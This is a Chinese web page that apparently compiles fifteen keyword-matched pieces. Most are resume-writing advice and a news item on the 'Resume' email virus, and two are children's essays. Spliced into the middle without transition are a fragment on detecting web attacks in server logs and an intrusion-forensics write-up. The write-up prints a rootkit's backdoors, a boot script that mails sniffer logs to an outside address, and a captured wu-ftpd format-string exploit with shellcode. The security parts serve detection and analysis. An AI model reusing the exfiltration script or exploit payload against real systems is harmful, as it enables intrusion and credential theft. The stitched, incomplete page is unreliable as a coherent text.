这里给大家分享一些追踪“简历杀手”,本文共15篇,供大家参考。

篇1:追踪“简历杀手”
追踪“简历杀手”
id=“1612120”> 29日,当你打开电脑,发现电子信箱里有珍妮特·西蒙斯的求职简历邮件,请切记:不要打开.5月初肆虐全球的“爱虫”、“新欢”病毒刚刚平息,另一种致命的“简历杀手”电脑病毒又在美国出现,已经有好几家反电脑病毒公司报告说一些大公司的电脑系统遭到了攻击,有的已经陷入了瘫痪。美国联邦调查局26日晚发布消息说,一种与去年3月发作的“梅利莎”病毒类似的被冠名以“简历杀手”的病毒再次在美国出现,这种病毒依靠电子邮件传播,并能够依靠微软公司的outlook收发邮件软件迅速扩散。
“简历杀手”病毒与“梅利莎”病毒一样,将病毒程序隐藏在微软公司文字处理软件word文件之中,以附件的形式附着在电子邮件当中。
据悉,载有这种病毒的电子邮件从外观上来看与一封很平常的简历没有什么两样。在邮件的主题栏上,写着“简历———珍妮特·西蒙斯”的字样,邮件正文写得也十分工整,抬头是“销售部/市场部经理启,”正文写道:“附件里是我的简历和推荐材料。如果您对我的履历还有什么疑问的话,请一定打电话给我或者给我发电子邮件。我静候您的`回复。您忠实的珍妮特·西蒙斯”。可是,一旦打开附件,病毒就会发作,首先会自动搜索outlook软件的地址簿,把载有病毒的电子邮件转发给地址簿里所有人。然后病毒就会删除电脑硬盘上的一些重要文件,使整个系统陷入瘫痪。据电脑专家称,即使电脑里没有装outlook软件,只要电脑使用的是微软视窗操作系统,病毒一样能够破坏系统的正常运行。
联邦调查局说,这一病毒将在今后3天内蔓延,在美国当地时间30日达到高峰。建议用户如果收到类似的电子邮件,一定不要打开,应立即关闭outlook软件的“执行概要功能”,然后将邮件删除。一些反病毒专家还建议说,用户关闭word软件中的“宏”也能够预防病毒的发作。
据悉,现在美国已经有两家反电脑病毒公司在网站上公布升级后的杀毒软件,能够成功防止“简历杀手”病毒的发作,同时微软公司也正在开发补丁程序,以确保out?look软件使用起来更加安全。
由于“简历杀手”病毒出现的时机恰逢周末,大多数公司的电脑此时处于关闭状态,因此迄今该病毒扩散的范围并不很广,造成的损失也有限。到了周一人们上班之后,大多数公司尽可以从网上升级杀毒程序,从而保证系统的安全。
篇2:追踪“简历杀手”
追踪“简历杀手”
29日,当你打开电脑,发现电子信箱里有珍妮特·西蒙斯的求职简历邮件,请切记:不要打开5月初肆虐全球的“爱虫”、“新欢”病毒刚刚平息,另一种致命的“简历杀手”电脑病毒又在美国出现,已经有好几家反电脑病毒公司报告说一些大公司的电脑系统遭到了攻击,有的已经陷入了瘫痪。
美国联邦调查局26日晚发布消息说,一种与去年3月发作的“梅利莎”病毒类似的被冠名以“简历杀手”的病毒再次在美国出现,这种病毒依靠电子邮件传播,并能够依靠微软公司的Outlook收发邮件软件迅速扩散。
“简历杀手”病毒与“梅利莎”病毒一样,将病毒程序隐藏在微软公司文字处理软件WORD文件之中,以附件的形式附着在电子邮件当中。
据悉,载有这种病毒的电子邮件从外观上来看与一封很平常的简历没有什么两样。在邮件的主题栏上,写着“简历———珍妮特·西蒙斯”的.字样,邮件正文写得也十分工整,抬头是“销售部/市场部经理启,”正文写道:“附件里是我的简历和推荐材料。如果您对我的履历还有什么疑问的话,请一定打电话给我或者给我发电子邮件。我静候您的回复。您忠实的珍妮特·西蒙斯”。可是,一旦打开附件,病毒就会发作,首先会自动搜索Outlook软件的地址簿,把载有病毒的电子邮件转发给地址簿里所有人。然后病毒就会删除电脑硬盘上的一些重要文件,使整个系统陷入瘫痪。据电脑专家称,即使电脑里没有装Outlook软件,只要电脑使用的是微软视窗操作系统,病毒一样能够破坏系统的正常运行。
联邦调查局说,这一病毒将在今后3天内蔓延,在美国当地时间30日达到高峰。建议用户如果收到类似的电子邮件,一定不要打开,应立即关闭Outlook软件的“执行概要功能”,然后将邮件删除。一些反病毒专家还建议说,用户关闭WORD软件中的“宏”也能够预防病毒的发作。
据悉,现在美国已经有两家反电脑病毒公司在网站上公布升级后的杀毒软件,能够成功防止“简历杀手”病毒的发作,同时微软公司也正在开发补丁程序,以确保Out?look软件使用起来更加安全。
由于“简历杀手”病毒出现的时机恰逢周末,大多数公司的电脑此时处于关闭状态,因此迄今该病毒扩散的范围并不很广,造成的损失也有限。到了周一人们上班之后,大多数公司尽可以从网上升级杀毒程序,从而保证系统的安全。
篇3:简历的四大杀手
1.缺少焦点
成功找到工作的第一步是认清你的目标。特别要明确你在下一份工作中想要得到什么,或者你下一份工作的职位。我听过无数 找工作 的人在被问到想找什么样的工作的时候说,“什么事情我都能做”,或者“做什么都行”。什么事情都愿意做的人,最后什么都得不到。
看看你的简历。你的目标是什么?要避免没有目标以及列出好几个目标。这两种极端都对你不利,会让显得你很不专注、没有责任感、不够格。在我们的职业生涯中,很多人戴过各种各样的帽子,最好可以把注意力放在其中一顶,或者说一个明确的职位。就简历来说,比起那些什么都能做的人,现在的雇主更倾向于寻找那些理解力强有专长有发展的人。
所以问自己这个问题:“我到底适合什么职务?”“我能解决什么特殊的问题?”这可能是一个明确的职位,如果是这样,特别关注这个职位,然后在清单上划下“资格”。
2.忽视最重要的问题
大部分的简历都不能回答雇主的问题,“简历有什么对我有好处的?”雇主们有个问题,而不是一份工作。这个问题通常和钱有关。所以,寻找那些你能让他们得到回报的方法吧。通常一份简历被阅读的时间只有20秒,你不得不快速的回答这个问题。一个做好这件事的方法是使用简洁“独特的销售主张”(USP),这能把你在竞争者中脱颖而出。这份USP是一个简单的句子,它包括下面三个重要问题:
*你是谁
*你最强的地方
*你为公司带来什么可量化的初步效益
你的USP描述了你能为雇主带来什么。员工对雇主来说要么能赚钱要么会省钱。你要决定你为公司带来的价值属于哪一类。最好的陈述通常混合了美元数目或者是个百分比,再或者是在一个确定的时期能能够节省多少时间。
3.销售技巧、服务年限
技巧只是一种有用的东西。赶快扔掉工作相关技巧或者服务年限都属于销售因素这种老掉牙的心态。最新的观念是把你自己当作一个迷你的利润和消耗中心而不是当作一名员工。今天的雇主都认同结果,他们很少会被员工列出的一串技巧打动。取而代之的是,从各种方法证明你过去和现在的工作表现适合下一个雇主。
怎么能把自己变成公司决算表中的资产呢?还是那句话,把注意力放在你能为公司赚钱还是省钱的方面。考虑问题要超出你的技巧和工作职责,列出每一个你完成这件事情的可能的情况。
比如说,你是一名视频拍摄师做婚礼或者其他事情的剪辑。在交出你最后的作品之前多做一步,展示出你所有的后期制作成果。你这多做的一步可能为你的老板节省好几百的小时的额外工作。
这就会转化为你潜在的为老板节省了上千美元。这只是那种你应该写在简历上的事情。如果可能的话,尽量把你的成就货币化,或者说在成就方面给出具体的价值。
通过列举几种你能帮老板赚钱或者省钱(或者省时间)的具体办法,你就能在竞争者中脱颖而出迅速的引起读者的注意。
4.无差别的投递简历
一旦你有了一份好简历,如何投简历同样是件重要的事情。大部分 找工作 的人都把简历狂轰乱炸在 求职 板或者网站的的帖子里。事实上,有些地方还是要收钱的,但是这真是最好的办法吗?
谈到现在的金融危机, 招聘 高管Neil McNulty说,“现在比以往任何时期都需要 求职 者转变观点,从满天撒网转变到寻找‘机会’,危机和混乱不会影响机会,即使是经济最坏的时候机会也依然存在。”
这就意味着,作为 求职 者的你,必须超出求职板的界限,向那些公司和企业里正面对一些你能解决的问题的经理们毛遂自荐。开始可能难了点,因为这意味着你要做额外的调查而且要给那些你不认识的人打电话和他们做进一步的沟通。但正是这些谈话,会为你赢得介绍、面试 以及下一份工作,尤其在你有一份好简历做后盾的时候。
推荐阅读文章:
如何让你的简历更出彩? 怎样打造独特诱人简历 简历怎样才能“秒杀”HR
Set-Cookie: ASPSESSIONIDGQQQQQPA=IHOJAGJDECOLLGIBNKMCEEED; path=/
Cache-control: private
在IIS和Apache的log里显示如下:
IIS: 15:08:44 10.22.1.80 HEAD /Default.asp 200
Linux: 10.22.1.80- - [08/Oct/2002:15:56:39 -0700] “HEAD / HTTP/1.0” 200 0
以上的活动看上去很正常,也不会对服务器产生任何影响,但这是通常攻击的前奏。
3. Web站点镜像
黑客经常镜像一个站点来帮助攻击服务器,常用来镜像的工具有Windows下的Teleport pro和Unix下的Wget。
下面我们看使用这两个工具后在服务器记录里的信息:
16:28:52 10.22.1.80 GET /Default.asp 200
16:28:52 10.22.1.80 GET /robots.txt 404
16:28:52 10.22.1.80 GET /header_protecting_your_privacy.gif 200
16:28:52 10.22.1.80 GET /header_fec_reqs.gif 200
16:28:55 10.22.1.80 GET /photo_contribs_sidebar.jpg 200
16:28:55 10.22.1.80 GET /g2klogo_white_bgd.gif 200
16:28:55 10.22.1.80 GET /header_contribute_on_line.gif 200
16:49:01 10.22.1.81 GET /Default.asp 200
16:49:01 10.22.1.81 GET /robots.txt 404
16:49:01 10.22.1.81 GET /header_contribute_on_line.gif 200
16:49:01 10.22.1.81 GET /g2klogo_white_bgd.gif 200
16:49:01 10.22.1.81 GET /photo_contribs_sidebar.jpg 200
16:49:01 10.22.1.81 GET /header_fec_reqs.gif 200
16:49:01 10.22.1.81 GET /header_protecting_your_privacy.gif 200
10.22.1.80是使用Wget的Unix客户端,10.22.1.81是使用Teleport pro的Windows客户端,都请求robots.txt文件,Robots.txt是请求没有被镜像的文件时所要用到的.。所以看到有对robots.txt文件的请求,表明有镜像的企图。当然,在Wget和Teleport pro客户端,可以手工禁止对robots.txt文件的访问,这时,辨别方法可以看是否有从同一IP地址来的重复资源请求。
4.漏洞扫描
随着攻击的发展,我们可以用一些Web漏洞检查的软件,如Whisker,它可以检查已知晓的各种漏洞,如cgi程序导致的安全隐患等。下面是运行Whisker1.4的IIS和Apache的相关记录:
IIS
12:07:56 10.22.1.81 GET /SiteServer/Publishing/viewcode.asp 404
12:07:56 10.22.1.81 GET /msadc/samples/adctest.asp 200
12:07:56 10.22.1.81 GET /advworks/equipment/catalog_type.asp 404
12:07:56 10.22.1.81 GET /iisadmpwd/aexp4b.htr 200
12:07:56 10.22.1.81 HEAD /scripts/samples/details.idc 200
12:07:56 10.22.1.81 GET /scripts/samples/details.idc 200
12:07:56 10.22.1.81 HEAD /scripts/samples/ctguestb.idc 200
12:07:56 10.22.1.81 GET /scripts/samples/ctguestb.idc 200
12:07:56 10.22.1.81 HEAD /scripts/tools/newdsn.exe 404
12:07:56 10.22.1.81 HEAD /msadc/msadcs.dll 200
12:07:56 10.22.1.81 GET /scripts/iisadmin/bdir.htr 200
12:07:56 10.22.1.81 HEAD /carbo.dll 404
12:07:56 10.22.1.81 HEAD /scripts/proxy/ 403
12:07:56 10.22.1.81 HEAD /scripts/proxy/w3proxy.dll 500
12:07:56 10.22.1.81 GET /scripts/proxy/w3proxy.dll 500
Apache
10.22.1.80-[08/Oct/2002:12:57:28 -0700] “GET /cfcache.map HTTP/1.0” 404 266
10.22.1.80-[08/Oct/2002:12:57:28 -0700] “GET /cfide/Administrator/startstop.html HTTP/1.0” 404 289
10.22.1.80-[08/Oct/2002:12:57:28 -0700] “GET /cfappman/index.cfm HTTP/1.0” 404 273
10.22.1.80-[08/Oct/2002:12:57:28 -0700] “GET /cgi-bin/ HTTP/1.0” 403 267
10.22.1.80-[08/Oct/2002:12:57:29 -0700] “GET /cgi-bin/dbmlparser.exe HTTP/1.0” 404 277
10.22.1.80-[08/Oct/2002:12:57:29 -0700] “HEAD /_vti_inf.html HTTP/1.0” 404 0
10.22.1.80-[08/Oct/2002:12:57:29 -0700] “HEAD /_vti_pvt/ HTTP/1.0” 404 0
10.22.1.80-[08/Oct/2002:12:57:29 -0700] “HEAD /cgi-bin/webdist.cgi HTTP/1.0” 404 0
10.22.1.80-[08/Oct/2002:12:57:29 -0700] “HEAD /cgi-bin/handler HTTP/1.0” 404 0
10.22.1.80-[08/Oct/2002:12:57:29 -0700] “HEAD /cgi-bin/wrap HTTP/1.0” 404 0
10.22.1.80-[08/Oct/2002:12:57:29 -0700] “HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0” 404
检查这种攻击的关键是看同一IP地址对cgi目录(IIS是scripts,Apache是cgi-bin)文件请求出现多个404状态。这时就要检查相应cgi目录里的程序安全性。
5.远程攻击
下面我们以针对IIS的MDAC攻击为例,来了解远程攻击在log里的记录情况。MDAC漏洞使得攻击者可以在Web服务器端执行任何命令。
17:48:49 10.22.1.80 GET /msadc/msadcs.dll 200
17:48:51 10.22.1.80 POST /msadc/msadcs.dll 200
当攻击发生后,在log会留下对msadcs.dll请求的记录。
另一个有名的攻击是asp源代码泄漏的漏洞,当这种攻击发生时,log文件会有如下记录:
17:50:13 10.22.1.81 GET /default.asp+.htr 200
对于未授权访问的攻击记录,Apache log会显示:
[08/Oct/2002:18:58:29 -0700] “GET /private/ HTTP/1.0” 401 462
6.总结
管理一个安全站点要求系统管理人员具备安全的常识和警惕性,从不同的渠道了解安全的知识不仅能对付已发生的攻击,还能对将会发生的攻击做到较好的防范。而通过Log文件来了解、防范攻击是很重要但又经常容易忽略的手段。
IDS(入侵检测系统)能帮助你很多,但不能完全代替安全管理。仔细检查Log,IDS所遗漏的东西,就可能在这里发现。
篇9:网上追踪
1.昨天当我查询我的一台机器时,意外的发现有人入侵了 其实是我自己的失误,没有打上wuftpd26的补丁,
又没有改/etc/ftpusers 让人轻易的利用wuftpd26的远程漏洞用匿名用户进入了我的机器,
网上追踪
。不过这位朋
友显然未加考虑的使用了rootkit,结果造成ps 输出的结果是这样:
[root@ns]# ps
PID TTY STAT TIME COMMAND
678 1 S 0:00 /sbin/mingetty tty1
679 2 S 0:00 /sbin/mingetty tty2
680 3 S 0:00 /sbin/mingetty tty3
681 4 S 0:00 /sbin/mingetty tty4
682 5 S 0:00 /sbin/mingetty tty5
683 6 S 0:00 /sbin/mingetty tty6
5557 ? S 0:00 /bin/sh -i
5591 ? R 0:00 ps
这样的输出结果我想谁看了都知道是个什么意思。那么就让我们一步一步看看他做了些什么吧
[这位hack没有想到这机器已经早有主人了,并且安装了自己的rootkit工具包]
[root@ns]# strings /bin/login|more
..........
__bss_start
_end
PPRV
DISPLAY
/bin/envpc
l4m3r0x
/bin/sh
从上可以看出是个login后门,通过export PATH=“l4m3r0x”后,直接telnet对方就能得到#
[root@ns]# strings /bin/ls|more
.....
always
/usr/local/share/locale
fileutils
GNU fileutils-3.13
vdir
%s - %s
/dev/sgk/.fsdc/.1file
//DIRED//
//SUBDIRED//
POSIXLY_CORRECT
COLUMNS
注意看了, /dev/sgk/.fsdc/.1file这就是他rootkit文件放的位置了,那么让我们看看那儿都有些什么吧
[root@ns]# mv /dev/sgk/.fsdc/.1file /tmp
[root@ns]# ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2 lujiang lujiang 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 lujiang lujiang 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 lujiang lujiang 9396 Aug 23 killall-real
-rwxr-xr-x 1 lujiang lujiang 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 lujiang lujiang 6232 Sep 9 1999 parse1
drwxrwxr-x 2 lujiang lujiang 1024 Jan 28 16:34 patches
-rwxr-xr-x 1 lujiang lujiang 28004 Aug 23 1999 ps-real
-rwxr-xr-x 1 lujiang lujiang 580696 Feb 18 ssh
-rw-r--r-- 1 root ftp 1398 Feb 4 08:55 system
呵呵,看来东西还真不少,从ftp可以知道他是利用的ftP漏洞,从lujiang知道他还窃取了个本地用户
[root@ns .fsdc]# cat .1logz
rshd
[root@ns .fsdc]# cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root@ns .fsdc]# cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse
.1logz是被syslogd调用,隐藏所列出命令所产生的记录.
.1proc被ps命令调用.隐藏所列出的进程名称
.1file被ls,find命令掉用.隐藏所列出的文件名,
[root@ns .fsdc]# cd patches
[root@ns patches]# cat patch.sh
#!/bin/sh
echo “[1] Patching WU-FTPd...”
rpm -Uhv wuftpd.rpm
echo “[2] Patching NFS-utils...”
rpm -Fvh nfs-utils.rpm
ps aux >> /tmp/psaux
if [ “`cat /tmp/psaux | grep rpc.statd`” ]; then
echo “[3] Restarting the rpc.statd daemon (NFS-utils)”
/etc/rc.d/init.d/nfslock restart
else
echo “[4] The daemon rpc.statd isnt running, so no need to restart!”
fi
rm /tmp/psaux
这是个为wuftpd和rpc.statd漏洞准备的补丁包[我很赞赏此君的做法]
其他的文件目录我就没有仔细看了[这些打包后会提供下载]
根据.1file的隐藏文件列表我们一一找到了这些文件.
[root@ns .fsdc]# strings /usr/bin/xtty
......
PPRV
(nfsiod)
socket
bind
listen
accept
/bin/sh
不难看出是个后门
[root@ns .fsdc]# strings /dev/pttys
#!/bin/sh
cat /dev/sgk/.fsdc/system | mail prosupp@usa.net >/dev/null 2>&1
nohup /usr/lib/lpset > /dev/null &
nohup /usr/bin/xtty > /dev/null &
rm -rf nohup.out
这位hack很聪明,通过此脚本就可以把嗅探记录发往prosupp@usa.net [/dev/sgk/.fsdc/system是个嗅探记录]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ “$PROMPT” != “no” ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]=%.100s, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new %d bit RSA key.
RSA key generation complete.
f:p:b:k:h:g:diqV:
i686-unknown-linux
1.2.27
sshd version %s [%s]
Usage: %s [options]
Options:
/usr/info/.clib存放着一个ssh后门,这样机器启动后都会为hack开放方便之门.
[root@ns .fsdc]# strings /sbin/syslogd
============================================================
Time: %s Size: %d
Path: %s
=> %s [%d]
------------------------------------------------------------
Exiting...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/dev/null
eth0
system
cant open log
这位hack改动了syslogd文件,变成了一个sniffer
,
。。。。。。。。。
接下来就是还原系统了,修改被窃取的帐号密码。这就不在这里表诉了,从我的嗅探记录我知道了他是从这两台机器上来的
[root@ns man]# more system2
============================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
##g#>4h#>4hUSER ftp
#>hPASS 111F11CA?k^11^Ff1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
#>h<#?hsite exec xx(%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f
%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%
.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f
%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f|%p
#@@h
============================================================
Time: Sat Feb 3 06:01:39 Size: 44
Path: 216.12.101.4 =
篇10:追踪“陨石”
追踪“陨石”
公元的一个夜晚,深蓝的天空中挂着一轮皎洁的圆月。突然,一颗流星划过天空,打破了黑夜的宁静。翌日,我接到了来自国际太空检测中心的消息,昨夜的那颗流星是从天龙座来的,有巨大的科学价值。我负责追查这颗“陨石”的'下落,并尽快将“陨石”带回国际太空检测中心。
我开着一艘微型的自动飞行器在一个晴朗的早上出发了,很快来到了“陨石”最有可能的下落点――百慕大海域的上空,历经了几个世纪的百慕大海域在科技时代仍有无限的神秘色彩,至今仍有许多神秘现象无法解释。看来人类要彻底理解百慕大海域仍需要时间。
我的飞船在距离海面最低的上空盘旋着,开始仔细地搜索。蓦地,探索显示器的指针指向了不远处一个小岛。岛上没有树木,更没有一只动物,只有岛中央的一座巨大的死火山,火山口在冒着缕缕热气。周围死一般的寂静,让人有些胆战心惊。指针既然指向这座小岛。说明小岛一定与那“陨石”有关,不过周围没有任何受到撞击而形成的洞存在。莫非――我疑惑地看着那座死火山。
突然,整个小岛开始摇晃起来,火山口发出阵阵强烈的橙光,一个碟状的事物从里面缓缓升起。
难道,这就是那颗“陨石”的真面目――UFO?
飞碟上下来了一个外星人,有着与人类相仿的外表,不同的是,他头上有着两个触角。
“人类,”那个外星人说话了,声音如同从九天传来,轻柔而缥缈,“你们已经将地球环境破坏了大部分,还想要毁灭这唯一的净地吗?”
我哑口无言,事实上,我根本说不了话,身体像上被什么 束缚住一般,不能行动。
“唉”,外星人叹了一口气,道:“你们慢慢地将地球破坏,最终,只会害了你们自己。人类啊,你们为什么就是不懂呢?”
说到最后一句话时,突然,我头一痛,便昏了过去。醒来时,我已在我的办公室里了。外星人已不见踪影。
我琢磨着他最后一句话,对啊!人类为什么就是不懂啊!
篇11:简历头号杀手:夸大的目标
作为一名技术招聘主管,我在从业过程中审视过大量简历,所以知道具有哪些特点的简历
会直接被拒。如果其中含有一些根本性的缺陷,再好看的字体或格式都无法挽救它们。让我们
来研究一下这些简历杀手,以及如何避免它们。
篇12:简历头号杀手:夸大的目标
简历中隐藏的第一个陷阱就是求职的“目标”(Objective)。这个目标本应告诉招聘者你
想要做什么。不能多,也不能少。听起来很容易,是吗?但有的时候,求职者会下意识地告诉
你更多的、无足轻重的东西。他们试图把它转变成一条宣传标语,反而漏掉了真正有用的信息。
目标要客观
在“目标”陈述中,不需要你用雄辩的口才来说服招聘人员你是多么热切地希望迎接挑战
并获得这个职位。例如: Objective: To showcase my unendingdesire to enrich yo-
ur company by performing marvelous feats of incredible, selfless acts of corporate
heroism.(目标:我真诚地希望通过令人难以置信的、无私的团体合作,借助我非凡的技艺来
为贵公司的发展添砖加瓦。)
有什么问题?这个求职目标没有告诉招聘人员任何事情。说漂亮话是很容易的,但他们真
正想知道的是你想申请什么工作。要他们凭空猜测是不现实的。漂亮话不会讨人喜欢,没有实
际用途。
明白说出你想要的工作
你的目标陈述应抓住最根本的.东西。例如,如果申请的是在广告上找到的一个特定职位,
采用以下格式就保证不会出错:
Objective: The position of Lead Developer, listing # A-2 JAVADEV, posted on
Gimmejob.com on Friday, Feb. 28, .(目标:总开发师职位,编号A-2 JAVADEV),20
2月28日(周五)发布于Gimmejob.com。)
这个目标陈述完全抓住了最根本的东西。你准确告诉了招聘人员自己希望的职位,以及职
位的发布日期。而招聘人员不假思索地就知道该如何处理这个申请。
篇13:杀手级简历是如何写出来的
1. 简历里要有你工作的技术细节:
编程语言,你的个人成就和水平。 我有时会看到一些简历,里面的工作描述就只有一行话,像这样:
* 在一个3人组成的团队里开发一个 e-mail 插件。
筛选者在阅读你的简历时心里都有选择标准, 1. 工作的挑战性如何, 2. 你的工作跟我们公司有多少相关性,所以你需要把工作描述清楚。 更合适的写法应该是这样的:
* 用C++语言实现一个用来执行自动备份的 Outlook e-mail 插件。
有三个人一起开发这个任务,其他两个人分别负责编写备份存储服务器
和产品的打包、分发给300,000个客户。
2. 不要让平淡的事情冲淡了你的简历的吸引力。
如果你写了太多的鸡毛蒜皮的事,它会拉低你整个简历的质量水平。 你丝毫没有必要写上”我按时完成了这个任务,并达到了预期目标。” 你不说,读者也会默认这样的,而你把一个不是什么成就的事情当成一个成就写出来反而会弱化你的简历。
有时我会看到这样的一个“主要工作内容”介绍:
实习生, XYZ 公司
* 优化ABC组件代码,使其执行效率提高20%。
* 用C++实现ABC组件的前端程序。
* 整理文档,做一些行政工作。
如果这最后一条不是像前两条那样有影响力,那就去掉它。即使只写了一条也不会有问题——只要它是能吸引人的信息。
3. 真实的反映你的工作,不要浮夸。
筛选者都是用自己的感觉来判断你的工作的性质和价值的,你要写一些量词,奖励(公司内部或外部的),新闻报道,工资涨幅,以及其它的可测量的事情。不要用 你自己的主观意识去描述。 这样既能抬高自己,又不会显得你很傲慢。
不要写“快速的开发出了令人赞叹的软件”,应写成“通过3周的努力使软件的效率提高了25%”。 不要写成“每当其他人搞不定时,我都被叫去去救火”,应该写成“我先后被派往了三个进度严重滞后的项目,并分别帮它们度过难关。”
同样,不要做荒诞式的浮夸,就像下面这样:
通过组织了一次冰淇淋Party,让几个团队之间实现了融洽的合作。
4. 详细列出所有能提升你形象的事情 (奖励, 特别的项目)。
我有个朋友叫 Melody (化名),我认识她有了。她开发的一个产品让她的XXX公司赚取了百万美元,获得了很多的行业赞誉,这个软件成了她们公司的旗舰软件。我去上海时,看到高速路旁边树着一排她们的产品的`广告牌。 然而,当我看她的简历时,上面只写道:
* 公司产品的技术负责人,此产品为用户执行X任务提供企业级解决方案。
你要写出你获得的荣誉和奖励!
如果你在业余时间完成了一些有技术挑战性的项目,或者还有一批可观的用户(几百号),这些也一并列在你的简历里。
5. 别撒谎。
这似乎不需要提醒,但我曾好几次在招聘评审会上看到有简历写着:“重写了XYZ公司的电子商务系统后端程序”。可评审会的一个会员却说:“我在XYZ公司干过,他不是干这个的!”
就凭这一点就完全有理由拒绝这个人。
祝你能写出一个好简历!这是个有挑战性的任务,但也是个可以完成的任务。
做为一个例子,你可以看一下我自己的简历。
在快结束的时候,我想向大家举几个我特别有印象的简历…
有一个应聘人在他的简介的第一句话里使用了”ass(傻蛋之类的意思)“这个词。(不合适,但他被留下了,“Google 需要一个很强的捣蛋的程序员去开发下一个XXX”)
有个人的简介里写道:”我没有时间去写简介。我要去参加聚会,跟女孩子们约会。“(不合适,我们没有要他!)
有个人写道: “绝对 P=NP”,当我面试他时,他说 “我说的N其实等于1。”
篇14:指导:简历必须提防四大杀手
指导:简历必须提防四大杀手
随着经济形势的下滑,全国的公司都被迫重新考虑他们未来的招聘计划,你现在的简历和你投简历的方法可能不再管用了。
下面这四个错误不管你犯了哪些,都应该再打磨你的简历改变你的方法了。
1.忽视最重要的问题
大部分的简历都不能回答雇主的问题,“简历有什么对我有好处的?”雇主们有个问题,而不是一份工作。这个问题通常和钱有关。所以,寻找那些你能让他们得到回报的方法吧。通常一份简历被阅读的时间只有20秒,你不得不快速的回答这个问题。一个做好这件事的方法是使用简洁“独特的销售主张”(USP),这能把你在竞争者中脱颖而出。这份USP是一个简单的句子,它包括下面三个重要问题:
*你是谁
*你最强的地方
*你为公司带来什么可量化的初步效益
你的USP描述了你能为雇主带来什么。员工对雇主来说要么能赚钱要么会省钱。你要决定你为公司带来的价值属于哪一类。最好的陈述通常混合了美元数目或者是个百分比,再或者是在一个确定的时期能能够节省多少时间。
2.缺少焦点
成功找到工作的第一步是认清你的目标。特别要明确你在下一份工作中想要得到什么,或者你下一份工作的职位。我听过无数找工作的人在被问到想找什么样的工作的时候说,“什么事情我都能做”,或者“做什么都行”。什么事情都愿意做的.人,最后什么都得不到。
看看你的简历。你的目标是什么?要避免没有目标以及列出好几个目标。这两种极端都对你不利,会让显得你很不专注、没有责任感、不够格。在我们的职业生涯中,很多人戴过各种各样的帽子,最好可以把注意力放在其中一顶,或者说一个明确的职位。就简历来说,比起那些什么都能做的人,现在的雇主更倾向于寻找那些理解力强有专长有发展的人。
所以问自己这个问题:“我到底适合什么职务?”“我能解决什么特殊的问题?”这可能是一个明确的职位,如果是这样,特别关注这个职位,然后在清单上划下“资格”。
3.销售技巧、服务年限
技巧只是一种有用的东西。赶快扔掉工作相关技巧或者服务年限都属于销售因素这种老掉牙的心态。最新的观念是把你自己当作一个迷你的利润和消耗中心而不是当作一名员工。今天的雇主都认同结果,他们很少会被员工列出的一串技巧打动。取而代之的是,从各种方法证明你过去和现在的工作表现适合下一个雇主。
怎么能把自己变成公司决算表中的资产呢?还是那句话,把注意力放在你能为公司赚钱还是省钱的方面。考虑问题要超出你的技巧和工作职责,列出每一个你完成这件事情的可能的情况。
比如说,你是一名视频拍摄师做婚礼或者其他事情的剪辑。在交出你最后的作品之前多做一步,展示出你所有的后期制作成果。你这多做的一步可能为你的老板节省好几百的小时的额外工作。
这就会转化为你潜在的为老板节省了上千美元。这只是那种你应该写在简历上的事情。如果可能的话,尽量把你的成就货币化,或者说在成就方面给出具体的价值。
通过列举几种你能帮老板赚钱或者省钱(或者省时间)的具体办法,你就能在竞争者中脱颖而出迅速的引起读者的注意。
4.无差别的投递简历
一旦你有了一份好简历,如何投简历同样是件重要的事情。大部分找工作的人都把简历狂轰乱炸在求职板或者网站的的帖子里。事实上,有些地方还是要收钱的,但是这真是最好的办法吗?
谈到现在的金融危机,招聘高管Neil McNulty说,“现在比以往任何时期都需要求职者转变观点,从满天撒网转变到寻找‘机会’,危机和混乱不会影响机会,即使是经济最坏的时候机会也依然存在。”
篇15:“爱心杀手”
“爱心杀手”_小学作文
我的鱼缸里养着几种小鱼,有的活泼好动,有的温情脉脉,还有的高贵典雅。爷爷要去旅行,要我把他养的小鱼接走,这样我的鱼缸里,就又多了一种小鱼。
